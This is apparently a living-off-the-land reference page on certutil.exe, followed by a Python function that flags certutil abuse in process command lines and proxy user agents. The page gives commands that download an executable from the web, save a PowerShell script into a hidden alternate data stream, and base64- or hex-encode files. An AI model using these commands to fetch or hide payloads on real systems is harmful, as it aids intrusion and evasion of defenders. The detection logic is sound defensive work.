~/Privilege Escalation/Windows/Binaries# cat Certutil.exe.md
Windows binary used for handling certificates
Paths:
C:\Windows\System32\certutil.exe
C:\Windows\SysWOW64\certutil.exe
Detection:
Certutil.exe creating new files on disk
Useragent Microsoft-CryptoAPI/10.0
Useragent CertUtil URL Agent
Download
Download and save 7zip to disk in the current folder.
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Download and save 7zip to disk in the current folder.
certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Alternate data streams
Download and save a PS1 file to an Alternate Data Stream (ADS).
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Encode
Command to encode a file using Base64
certutil -encode inputFileName encodedOutputFileName
Decode
Command to decode a Base64 encoded file.
certutil -decode encodedInputFileName decodedOutputFileName
Command to decode a hexadecimal-encoded file.
certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
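
The Detection criteria and the command lines listed above, expressed as log-matching logic over process-creation command lines and proxy-log user agents. This is an added example, not part of the original page; the function names, finding labels and sample command lines (hosts under example.test) are constructed for illustration.

```python
import re

# Verbs taken from the command lines listed on this page.
DOWNLOAD_VERBS = {"urlcache", "verifyctl"}
CODEC_VERBS = {"encode", "decode", "decodehex"}
# User-agent markers from the Detection section (lower-cased for matching).
UA_MARKERS = ("microsoft-cryptoapi/", "certutil url agent")

IMAGE_RE = re.compile(r"(^|[\\/])certutil(\.exe)?$", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
# path:stream, where the colon is not the drive-letter colon.
ADS_RE = re.compile(r"^(?:[a-z]:)?[^:]{2,}:[^:\\/]+$", re.I)


def classify_cmdline(cmdline):
    """Return sorted finding labels for one process-creation command line."""
    tokens = cmdline.split()
    if not tokens or not IMAGE_RE.search(tokens[0].strip('"')):
        return []
    # certutil accepts '-' or '/' before a verb; normalise both.
    verbs = {t.lstrip("-/").lower() for t in tokens[1:] if t[0] in "-/"}
    args = [t for t in tokens[1:] if t[0] not in "-/"]
    findings = set()
    if verbs & DOWNLOAD_VERBS and any(URL_RE.match(a) for a in args):
        findings.add("download")
    if verbs & CODEC_VERBS:
        findings.add("encode/decode")
    if any(ADS_RE.match(a) for a in args if not URL_RE.match(a)):
        findings.add("ads-write")
    return sorted(findings)


def suspicious_user_agent(ua):
    """True when a proxy-log user agent matches a Detection marker."""
    return any(marker in ua.lower() for marker in UA_MARKERS)


# Constructed sample command lines; hosts and file names are placeholders.
SAMPLES = [
    r"certutil.exe -urlcache -split -f http://example.test/a.exe a.exe",
    r"certutil.exe -verifyctl -f -split http://example.test/a.exe a.exe",
    r"certutil.exe -urlcache -split -f https://example.test/t.ps1 c:\temp:ttt",
    r"certutil -decode encodedInputFileName decodedOutputFileName",
    r"C:\Windows\System32\certutil.exe -hashfile setup.exe SHA256",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify_cmdline(line) or ["no-finding"], "<-", line)
```

The last sample, a plain hash computation, produces no finding, which keeps routine certificate and hashing use out of the alert stream.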